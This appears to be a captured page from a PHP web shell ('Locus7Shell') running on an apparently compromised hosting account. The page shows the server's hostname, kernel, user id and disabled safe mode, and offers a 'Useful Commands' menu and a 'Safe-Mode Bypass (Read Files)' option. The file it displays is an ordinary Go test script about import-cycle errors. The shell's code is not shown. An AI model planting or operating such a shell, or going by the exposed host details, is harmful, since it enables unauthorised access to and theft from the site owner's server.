![]() | |
---|---|
Software: Apache. PHP/5.4.45 uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue uid=243112(mycochar) gid=100(users) groups=100(users) Safe-mode: OFF (not secure) /home/mycochar/www/image/photo/go/src/cmd/go/testdata/script/ drwxr-xr-x |
Viewing file: Select action/file-type: env GO111MODULE=on # 'go list all' should fail with a reasonable error message ! go list all stderr '^package m\n\timports m/a\n\timports m/b\n\timports m/a: import cycle not allowed' # 'go list -e' should not print to stderr, but should mark all three # packages (m, m/a, and m/b) as Incomplete. go list -e -json all ! stderr . stdout -count=3 '"Incomplete": true,' -- go.mod -- module m require ( m/a v0.0.0 m/b v0.0.0 ) replace ( m/a => ./a m/b => ./b ) -- m.go -- package m import ( _ "m/a" _ "m/b" ) -- a/go.mod -- module m/a -- a/a.go -- package a import _ "m/b" -- b/go.mod -- module m/b -- b/b.go -- package b import _ "m/a" |
Useful Commands
|
Php Safe-Mode Bypass (Read Files)
|
--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0059 ]-- |